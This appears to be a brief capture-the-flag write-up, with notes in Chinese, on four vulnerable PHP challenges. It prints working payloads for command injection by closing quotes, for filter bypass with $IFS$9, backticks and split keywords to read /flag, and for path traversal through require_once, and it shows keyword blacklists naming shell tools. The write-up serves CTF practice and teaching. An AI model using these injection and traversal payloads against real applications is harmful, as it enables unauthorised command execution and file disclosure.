1,
<?php
highlight_file(__FILE__);
$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];
if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
$file1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
$file2 = "";
$flag = "#flag in fllllag";
$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';
$cmd = "file $comm1 $comm2";
system($cmd);
?>
$comm1 = '"' . $comm1 . '"';
comm1内容被"包围,所以可以用"闭合绕过;
payload:&comm1="|cat /flag;"&comm2=1
2,
$IFS$9 替代空格
`` 反引号在linux里面当作系统来执行, a>$b 将a的内容写入b
payload:ip=`ca''t$IFS$9/fla?>1.txt`
3,
<?php
$sandbox = md5("box".$_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']);
echo "you are in sandbox: ".$sandbox."<br/>";
@mkdir($sandbox);
chdir($sandbox);
$command = $_GET['command'];
if(strlen($command) < 8){
system($command);
}
show_source(__FILE__);
payload1:?command=cat /f*
<?php
require_once 'user.php';
$C = new Customer();
if(isset($_GET['action']))
require_once 'views/'.$_GET['action'];
else
header('Location: index.php?action=login');
?>
payload:action=../../../../flag